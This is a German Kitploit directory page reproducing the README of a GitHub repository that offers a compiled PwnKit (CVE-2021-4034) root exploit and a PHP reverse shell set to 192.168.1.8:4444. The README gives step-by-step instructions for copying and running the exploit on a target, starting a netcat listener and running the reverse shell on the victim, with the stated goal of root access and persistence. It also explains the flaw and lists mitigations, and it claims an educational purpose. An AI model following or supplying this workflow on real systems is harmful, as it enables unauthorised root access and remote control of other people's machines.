Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
hack — Sicherheitsforschungs-Repository mit einem Proof-of-Concept (PoC) für die Schwachstelle CVE-2021-4034 (PwnKit) und Scripting-Dienstprogrammen zur Demonstration von Privilegieneskalation und Remote-Ausführung in Linux-Umgebungen. | Kitploit
Tools/GitHubGitHub/jscamposx/hack
Privilege EscalationSchwachstellenanalyseExploitationLernen & BildungRemote-Access-ToolPayload-Entwicklung
GitHubjscamposx/hack

hack

Sicherheitsforschungs-Repository mit einem Proof-of-Concept (PoC) für die Schwachstelle CVE-2021-4034 (PwnKit) und Scripting-Dienstprogrammen zur Demonstration von Privilegieneskalation und Remote-Ausführung in Linux-Umgebungen.

Repository anzeigen
1vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

💀 PwnKit (CVE-2021-4034) & Reverse-Shell-Toolkit

Security Research CVE Language

⚠️ HAFTUNGSAUSSCHLUSS: Dieses Repository wurde ausschließlich zu Bildungs- und Sicherheitsforschungszwecken erstellt. Der Autor übernimmt keine Haftung für den Missbrauch dieser Werkzeuge. Verwende es nur in kontrollierten Umgebungen oder wo du ausdrückliche Erlaubnis hast.


📜 Beschreibung

Dieses Repository enthält einen kompilierten Proof of Concept (PoC) für die PwnKit-Schwachstelle (CVE-2021-4034), einen kritischen lokalen Privilegieneskalationsfehler in der pkexec-Komponente von Polkit.

Darüber hinaus ist ein PHP-Reverse-Shell-Skript enthalten, das nach der Exploitation oder als initialer Zugangsvektor bereitgestellt werden kann.

🎯 Ziel

Erlangen von root-Zugriff auf verwundbare Linux-Systeme und Aufbau von Persistenz oder Fernsteuerung mittels einer Reverse-Shell.


📂 Inhalte des Arsenals

1. PwnKit (ELF Binary)

Der kompilierte Exploit für CVE-2021-4034.

  • Funktion: Manipuliert die Umgebungsvariablen von pkexec, um eine bösartige Shared Library zu laden und Code als root auszuführen.
  • Architektur: x86_64 (Linux).
  • Abhängigkeiten: Erfordert, dass pkexec auf dem Ziel installiert ist.

2. reverseShell.php

Ein leichtes Payload zum Aufbau einer Reverse-Verbindung.

  • Aktuelle Konfiguration:
    • IP: 192.168.1.8
    • Port: 4444
    • Shell: /bin/bash
  • Verwendung: Kann über die CLI (php reverseShell.php) ausgeführt oder in einen verwundbaren Webserver injiziert werden.

🚀 Bedienungsanleitung

Phase 1: Privilegieneskalation (PwnKit)

  1. Übertrage die Binärdatei PwnKit auf das Zielsystem.
  2. Gib ihr Ausführungsberechtigungen:
    root@kitploit:~
    chmod +x PwnKit
    
  3. Führe den Exploit aus:
    root@kitploit:~
    ./PwnKit
    
    Bei Erfolg solltest du sofort eine Shell mit root-Rechten erhalten.

Phase 2: Fernverbindung (Reverse Shell)

  1. Starte auf deinem Angreifer-Rechner einen Listener mit Netcat:
    root@kitploit:~
    nc -lvnp 4444
    
  2. Bearbeite reverseShell.php, falls deine IP von der standardmäßig konfigurierten abweicht.
  3. Führe das Skript auf dem Opfer aus (als normaler Benutzer oder als root nach Verwendung von PwnKit):
    root@kitploit:~
    php reverseShell.php
    

🛠️ Technische Details (CVE-2021-4034)

Diese Schwachstelle liegt darin, wie pkexec die Befehlszeilenargumente verarbeitet. Wenn eine leere Argumentliste übergeben wird, versucht pkexec auf argv[1] außerhalb der Grenzen zuzugreifen, was es einem Angreifer ermöglicht, Umgebungsvariablen im Speicher zu überschreiben, insbesondere durch Injektion einer bösartigen GCONV_PATH-Variable, um den Ausführungsfluss zu entführen.

  • Offenlegungsdatum: Januar 2022.
  • Auswirkung: Sofortiger Root-Zugriff auf den meisten Standard-Linux-Distributionen (Ubuntu, Debian, Fedora, CentOS).

🛡️ Abhilfe

Um sich vor diesem Exploit zu schützen:

  1. Polkit aktualisieren: Installiere die von deiner Distribution bereitgestellten Sicherheitspatches.
  2. SUID-Bit entfernen (Temporäre Lösung):
    root@kitploit:~
    chmod 0755 /usr/bin/pkexec
    

Happy Hacking! 🏴‍☠️

Tool herunterladen